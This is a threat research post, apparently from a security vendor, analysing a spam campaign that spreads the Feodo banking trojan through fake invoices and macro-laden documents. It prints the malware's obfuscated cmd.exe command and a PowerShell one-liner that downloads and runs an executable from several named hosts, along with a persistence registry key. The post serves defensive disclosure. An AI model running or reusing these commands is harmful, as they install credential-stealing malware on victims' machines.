Active spam campaign spreading Feodo banking trojan spotted

The SonicWall Capture Labs Threat Research team has been observing an active spam campaign spreading a banking Trojan widely known as Feodo. This spam uses a very common tactic of sending a fake invoice or bank statement as an attachment with a link that leads to downloading malware.

Infection cycle:

The spam email purports to be from a bank or vendor or business supplier typically with a PDF or DOC attachment as show below.

Opening the PDF file, for instance, will then have a link to download your invoice or statement.

Clicking on the link will then download a document file which has embedded Visual Basic macros.

These macros will launch complex procedures when the document is opened. Macro security setting in the Trust Center is disabled by default and a security warning will appear once macro is detected within a document file. To circumvent this, the body of the document file actually instructs the victim to enable editing and enable content to view the document.

Once the Visual Basic script executes, cmd.exe is spawned which then executes powershell that will then download the banking Trojan.

Below is an example of what commands were executed by cmd and powershell to perform this malicious task:

<span data-mce-type=”bookmark” style=”display: inline-block; width: 0px; overflow: hidden; line-height: 0;” class=”mce_SELRES_start”></span><span data-mce-type=”bookmark” style=”display: inline-block; width: 0px; overflow: hidden; line-height: 0;” class=”mce_SELRES_start”></span>cmd /V^:ON/C”s^e^t ^F^w0=^ ^ ^ ^   ^  ^ ^  ^ ^ ^    ^}^}{^hctac^};^k^aerb;^Fc^Z$^ m^e^t^I^-^e^k^ovnI^;)^Fc^Z$^ ^,^tBK^$(^el^i^F^d^a^o^lnw^o^D^.^KRN${yr^t^{)lEh^$ n^i ^t^BK^$(h<span data-mce-type=”bookmark” style=”display: inline-block; width: 0px; overflow: hidden; line-height: 0;” class=”mce_SELRES_start”></span>c^aer^o^f;’^exe.’+^Uzw^$+’^\’^+ci^l^b^u^p:vne$^=^FcZ^$^;^’^3^3^3′ = ^Uzw^$^;)^’^@^'(til^pS^.^’^ORG/se^gam^i/x^u^d^er^-^demar^f/s^emeh^t/tnetn^oc-^pw/m^oc.re^seyla//:^pt^t^h^@RY^WR^B/^m^oc^.r^evo^e^k^a^m^gn^itnuoccaet^uni^m5//:pt^th^@2/27^1^.^82^1^.4^6.^5^4//:^pt^t^h@D^W^E5^PNfc/^s^da^ol^p^u/tn^e^tnoc-pw/^43.^2^.86.831//^:^p^tt^h@6^HJVL3^X/^u^e^.letoh^-n^o^llo^pa//:p^t^th’=lEh$^;tne^i^lCb^e^W.^t^eN tcejbo-^wen^=KRN$ ll^eh^sre^wo^p&&^f^or /^L %^J ^in (41^5^;^-1^;^0)d^o ^s^et 5^I=!5^I!!^F^w0:~%^J,1!&&^i^f %^J ^ls^s ^1 c^a^ll %5^I:^~4%”

<span data-mce-type=”bookmark” style=”display: inline-block; width: 0px; overflow: hidden; line-height: 0;” class=”mce_SELRES_start”></span>powershell  $RFw=new-object Net.WebClient;$ubb=’http://sellitti.com/rPi7meKN6@http://syonenjump-fun.com/hYpebiyp@http://graphixhosting.co.uk/logsite/pvzEVKh@http://smallplanettechnology.com/jUurjYuyyr@http://arrayconsultancy.com/3qOc0dx6mE’.Split(‘@’);$NhO = ‘141’;$spw=$env:public+’\’+$NhO+’.exe’;foreach($nGl in $ubb){try{$RFw.DownloadFile($nGl, $spw);Invoke-Item $spw;break;}catch{}}

It then executes the downloaded Feodo Trojan. The trojan copied itself as “pagesrouted.exe” and registered itself in the registry to ensure persistence.

• HKLM/Software/Microsoft/Windows/CurrentVersion/Run  pagesrouted   “%APPDATA%/Local/Wndows/pagesrouted.exe”

During our analysis, the Trojan just runs quietly in the background. Once we opened a browser instance and logged onto an online banking website, it then contacted a known Feodo C&C server and sent encrypted data.

During the past week, we have observed this threat spread throughout the United States, Germany, India and Brazil.

SonicWall Capture Labs provides protection against this threat via the following signatures:

• GAV: Feodo.S (Trojan)
• GAV: Feodo.S _2 (Trojan)